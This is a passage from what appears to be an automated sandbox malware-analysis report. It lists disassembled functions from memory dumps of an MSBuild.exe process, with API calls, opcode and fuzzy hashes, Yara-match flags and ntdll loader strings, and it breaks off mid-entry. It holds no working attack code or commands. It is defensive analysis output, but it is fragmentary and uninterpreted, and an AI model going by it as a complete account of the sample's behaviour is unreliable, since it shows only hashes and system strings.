                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 4789071F$4789071F
                                                                                                              • API String ID: 1836367815-3950601534
                                                                                                              • Opcode ID: 78359790b95226ea04be1a2bb8184a0a9cd1537a66412848d3fdb8bf1f548c67
                                                                                                              • Instruction ID: cc53f823d8dfc0b45ef7b9f8de6580349de30d18372f7ad225674a21dd890d50
                                                                                                              • Opcode Fuzzy Hash: 78359790b95226ea04be1a2bb8184a0a9cd1537a66412848d3fdb8bf1f548c67
                                                                                                              • Instruction Fuzzy Hash: 6D315072A0118D7FDB11EBA5DC81DDF7B78EF81358B4441AEF804D7142D2385E468795
                                                                                                              Function 00414383 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 42 414383-414395 43 41439d-4143ed call 42f653 call 417b53 call 4045e3 call 425263 42->43 44 414398 call 42ec43 42->44 53 41440d-414413 43->53 54 4143ef-4143fe PostThreadMessageW 43->54 44->43 54->53 55 414400-41440a 54->55 55->53
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(4789071F,00000111,00000000,00000000), ref: 004143FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 4789071F$4789071F
                                                                                                              • API String ID: 1836367815-3950601534
                                                                                                              • Opcode ID: 1a784243e21fd54dc545d600bee99c5129cb96a11552e9cd6bfdcba40e9bdccc
                                                                                                              • Instruction ID: 65ee05b1a01d88756ff80e197dafe2d6756dff3dc722b98f382466506fc213f6
                                                                                                              • Opcode Fuzzy Hash: 1a784243e21fd54dc545d600bee99c5129cb96a11552e9cd6bfdcba40e9bdccc
                                                                                                              • Instruction Fuzzy Hash: EA01C4B1D0115C7ADB11AAE19C82DEF7B7CDF80798F44806AFA1467241D6385E068BB5
                                                                                                              Function 00417BED Relevance: 1.6, APIs: 1, Instructions: 66libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 88 417bed-417bfd 89 417b96-417bb1 call 42e223 88->89 90 417bff 88->90 99 417bb3-417bc7 LdrLoadDll 89->99 100 417bca-417bcd 89->100 92 417c01-417c02 90->92 93 417c56 90->93 94 417c26-417c52 93->94 95 417c58-417c6e 93->95 94->93 99->100
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 31f813af035243cd26d958f17192baafba51a5d628c02dc63890d59a6f01c254
                                                                                                              • Instruction ID: fdd1673baecdba0cb85ff3e44e7a2cc4aea26df2d36a71aaa7c4bce748f2a361
                                                                                                              • Opcode Fuzzy Hash: 31f813af035243cd26d958f17192baafba51a5d628c02dc63890d59a6f01c254
                                                                                                              • Instruction Fuzzy Hash: 29118071508647AFCB00EBA8D845EDDBBB1FB05308F18469EE694C7247E330A656C786
                                                                                                              Function 00417C04 Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 101 417c04-417c1c 102 417ba2-417ba3 101->102 103 417c1e-417c24 101->103 104 417ba9-417bb1 102->104 105 417ba4 call 42e223 102->105 106 417c26-417c56 103->106 108 417bb3-417bc7 LdrLoadDll 104->108 109 417bca-417bcd 104->109 105->104 111 417c58-417c6e 106->111 108->109
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: cc8a6b35f9b06c9bcd1abd51de4572752eb33230937752413e5eabfb53e9cb37
                                                                                                              • Instruction ID: 15684ca63856f2ce53043c4ffa10e50dccb7a9086da29da0e7077bbd191f691f
                                                                                                              • Opcode Fuzzy Hash: cc8a6b35f9b06c9bcd1abd51de4572752eb33230937752413e5eabfb53e9cb37
                                                                                                              • Instruction Fuzzy Hash: 0E0147B180460BEBCF00EEB8D981EDCBBF0FB14308F144299E98497206E730B655CB81
                                                                                                              Function 0042CE73 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 132 42ce73-42ceb1 call 404673 call 42dd33 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,6ED9EBA1,00000007,00000000,00000004,00000000,004173CD,000000F4), ref: 0042CEAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 851142cb7fa9c83753263c3c10c1740acc6173fb79af0817dc9ff9eee6ffe6a5
                                                                                                              • Instruction ID: b9ca338e60bd2b7943d9d7f0314c95f70423a11a6c33ef79f219f8aa7d44deaa
                                                                                                              • Opcode Fuzzy Hash: 851142cb7fa9c83753263c3c10c1740acc6173fb79af0817dc9ff9eee6ffe6a5
                                                                                                              • Instruction Fuzzy Hash: EDE06D712042047BC614EE59EC41E9B73ACDFC5714F000419FA08A7281DA75B911CBB8
                                                                                                              Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 127 42ce23-42ce64 call 404673 call 42dd33 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E90E,?,?,00000000,?,0041E90E,?,?,?), ref: 0042CE5F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: fc17c7c206684ab0106122256be8546507daf1ce0ff0ed4a555c94f2499e0637
                                                                                                              • Instruction ID: 2b5b20150f49385b7742a7a5713349b9e5883766a4ace5a7f153605199b15d46
                                                                                                              • Opcode Fuzzy Hash: fc17c7c206684ab0106122256be8546507daf1ce0ff0ed4a555c94f2499e0637
                                                                                                              • Instruction Fuzzy Hash: 8FE06D723042047BD610EE59EC41E9B73ACEFC5B10F00441AFA09A7241D674B911CAB9
                                                                                                              Function 0042CEB3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 142 42ceb3-42ceec call 404673 call 42dd33 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,DB4F967F,?,?,DB4F967F), ref: 0042CEE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 81d74574fff730ef8ffa995280186f1862f3d553ae12748c9d2894c8fee9ffea
                                                                                                              • Instruction ID: 1766ae2e7b72796083ce1554eeb2be80e0dee529967217328c78c90fce4a93bd
                                                                                                              • Opcode Fuzzy Hash: 81d74574fff730ef8ffa995280186f1862f3d553ae12748c9d2894c8fee9ffea
                                                                                                              • Instruction Fuzzy Hash: 2DE04F757112147BD110FA5ADC01F97776CDBC5714F40445AFA0867241C675790187F8
                                                                                                              Function 013D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 147 13d2c0a-13d2c0f 148 13d2c1f-13d2c26 LdrInitializeThunk 147->148 149 13d2c11-13d2c18 147->149
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8aae6cb4ebc02a51679b100cdc5eedd9c87adf5af78f344f4cd8ea65896d9fc5
                                                                                                              • Instruction ID: 15c3b7c43ec97361734baa26885384f78ebbb9aba6f32eb79e3d2e6b823790ec
                                                                                                              • Opcode Fuzzy Hash: 8aae6cb4ebc02a51679b100cdc5eedd9c87adf5af78f344f4cd8ea65896d9fc5
                                                                                                              • Instruction Fuzzy Hash: F9B09B72D015D5C5EE12E764560C717794077D0705F15C061D2030745F4738C5D5E275

                                                                                                              Non-executed Functions

                                                                                                              Function 01412349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 0a0f28befa12386349b7bd18fca16f6a7d2ca4d6971a8d7819de83c59b9b4959
                                                                                                              • Instruction ID: a67bf6fa5c7c0cb25e8ac7877a065892e89ae6e29278bf2ba699bf5deaab6259
                                                                                                              • Opcode Fuzzy Hash: 0a0f28befa12386349b7bd18fca16f6a7d2ca4d6971a8d7819de83c59b9b4959
                                                                                                              • Instruction Fuzzy Hash: BC928D71604342AFE725DF28C880F6BBBE8BB84754F24491EFA94D7264D7B0E845CB52
                                                                                                              Function 013C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • corrupted critical section, xrefs: 014054C2
                                                                                                              • Critical section address, xrefs: 01405425, 014054BC, 01405534
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01405543
                                                                                                              • Critical section debug info address, xrefs: 0140541F, 0140552E
                                                                                                              • Thread identifier, xrefs: 0140553A
                                                                                                              • undeleted critical section in freed memory, xrefs: 0140542B
                                                                                                              • double initialized or corrupted critical section, xrefs: 01405508
                                                                                                              • Address of the debug info found in the active list., xrefs: 014054AE, 014054FA
                                                                                                              • 8, xrefs: 014052E3
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0140540A, 01405496, 01405519
                                                                                                              • Invalid debug info address of this critical section, xrefs: 014054B6
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014054CE
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014054E2
                                                                                                              • Critical section address., xrefs: 01405502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: 23d498aad1c5c4282835437a9aeb5790799cb6e13b4b365a3e9a723372d9f9ff
                                                                                                              • Instruction ID: 75cc28cf240e158aaf89e33d342f072a3cfc591038a74193adaa665da426f8b8
                                                                                                              • Opcode Fuzzy Hash: 23d498aad1c5c4282835437a9aeb5790799cb6e13b4b365a3e9a723372d9f9ff
                                                                                                              • Instruction Fuzzy Hash: 1C815E71A40358EFEB21CF9AC845BAEBBB5EB08B18F10416AE504BB790D375A945CF50
                                                                                                              Function 013C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014024C0
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01402412
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01402506
                                                                                                              • @, xrefs: 0140259B
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014025EB
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01402624
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01402498
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014022E4
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0140261F
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01402409
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01402602
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 9b6294095b90a54bc7db921545656b825156a05b0c9754fac3274c4608894a3a
                                                                                                              • Instruction ID: bd1e84fcff86479adee0bd1fff783a774e8d2717ac8259c1a8a4cf41493af126
                                                                                                              • Opcode Fuzzy Hash: 9b6294095b90a54bc7db921545656b825156a05b0c9754fac3274c4608894a3a
                                                                                                              • Instruction Fuzzy Hash: A40270F1D002299BDF31DB59CC84BDAB7B8AB54708F0041EAE60DA7291DB719E84CF59
                                                                                                              Function 01438B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: e1e0575bea32dcc2ee6a1ef5930cf347117c505483a69158a9edcd9255c68ef6
                                                                                                              • Instruction ID: cc7d390d424e484b852450ef2bc444d7fd776489b1eefe33e37f245353b4295a
                                                                                                              • Opcode Fuzzy Hash: e1e0575bea32dcc2ee6a1ef5930cf347117c505483a69158a9edcd9255c68ef6
                                                                                                              • Instruction Fuzzy Hash: C651C0715143029BD325CF188848BABBBECEFD8658F544A1EF998C3264E770D509CB92
                                                                                                              Function 01440274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: c62b9b478b53f3018b2da9da7b082702a93785c068f72085cce4f6bdf80de05a
                                                                                                              • Instruction ID: 47bd5d9bd9a17320339c3ecc378d070e476c339d0a565615d5ceb338c6ee690e
                                                                                                              • Opcode Fuzzy Hash: c62b9b478b53f3018b2da9da7b082702a93785c068f72085cce4f6bdf80de05a
                                                                                                              • Instruction Fuzzy Hash: 68D1BD31500686DFEB22EF68C440AEEBBF1FF59A14F08805AF64A9B362C7349951CB54
                                                                                                              Function 014189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • VerifierDebug, xrefs: 01418CA5
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01418B8F
                                                                                                              • VerifierFlags, xrefs: 01418C50
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01418A67
                                                                                                              • HandleTraces, xrefs: 01418C8F
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01418A3D
                                                                                                              • VerifierDlls, xrefs: 01418CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: d9bf7beb3cd44864e16d331ae43b60db3e5a11db81ff8fadbb47da99e55dfaff
                                                                                                              • Instruction ID: 260b528cdf527e40b090028f66651bcff366526d04398282ff12a1aea12c2687
                                                                                                              • Opcode Fuzzy Hash: d9bf7beb3cd44864e16d331ae43b60db3e5a11db81ff8fadbb47da99e55dfaff
                                                                                                              • Instruction Fuzzy Hash: 029103726417039BD721EF6CD880B5FBBA4AB94A18F04051EFA446F379D770AC058B91
                                                                                                              Function 0139EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: fde2a8d65d2a95edce580ba70d90f28e8d4d6acabe3e38d761e8c90be5fd4649
                                                                                                              • Instruction ID: e3038d81968f7c66a312f1b608eca4c30c1f953de5b751ac56a0f65b5db3157d
                                                                                                              • Opcode Fuzzy Hash: fde2a8d65d2a95edce580ba70d90f28e8d4d6acabe3e38d761e8c90be5fd4649
                                                                                                              • Instruction Fuzzy Hash: 51A23A74A0562A8FDF64DF18CD887AABBB9AF45318F1442EDD90DA7250DB309E85CF40
                                                                                                              Function 013C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: edc893cc88a7ccdc37972ff8a5d7a4145d9d87e5c4ddc3d88ddc9a9cdef463cd
                                                                                                              • Instruction ID: 5c18cd7b21d20716f114d0a95ee1a1ec54ced2433563898deae1135b653f8d9d
                                                                                                              • Opcode Fuzzy Hash: edc893cc88a7ccdc37972ff8a5d7a4145d9d87e5c4ddc3d88ddc9a9cdef463cd
                                                                                                              • Instruction Fuzzy Hash: 869139B0B003159BDB36DF19D846BAEBBA5AB50F58F14402EDA007B7E5D7749802C791
                                                                                                              Function 0138645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013E9A11, 013E9A3A
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013E99ED
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013E9A2A
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013E9A01
                                                                                                              • apphelp.dll, xrefs: 01386496
                                                                                                              • LdrpInitShimEngine, xrefs: 013E99F4, 013E9A07, 013E9A30
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: 898ed552c0b29c516054acedc5cd8444526f6638528cec9ebe6804b4c4a04e5b
                                                                                                              • Instruction ID: 036d69d602ee6e2335f53f89b8fe19d77a3041abb9a9f7b66a72d3a6649db302
                                                                                                              • Opcode Fuzzy Hash: 898ed552c0b29c516054acedc5cd8444526f6638528cec9ebe6804b4c4a04e5b
                                                                                                              • Instruction Fuzzy Hash: 8B5182712083059FE721EF28D846BAF77E8EF84A4CF00491DE5459B2A0DA30D944CB92
                                                                                                              Function 013C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014021BF
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01402180
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0140219F
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01402165
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01402160, 0140219A, 014021BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01402178
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 9ef725c281cef7b1f57c02b3f8e745a02d5b6dc3c4b1fdeacb3710441c400490
                                                                                                              • Instruction ID: b80634015fcff575594b0c843c09a44bfb1c64d7730fddc5bd58cf11b06945e7
                                                                                                              • Opcode Fuzzy Hash: 9ef725c281cef7b1f57c02b3f8e745a02d5b6dc3c4b1fdeacb3710441c400490
                                                                                                              • Instruction Fuzzy Hash: 24312F35F4021577F7229A9ACC89F5B7B78DB64E54F05406EFA046B291D2B09E01C7A1
                                                                                                              Function 013CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013CC6C3
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 014081E5
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01408170
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01408181, 014081F5
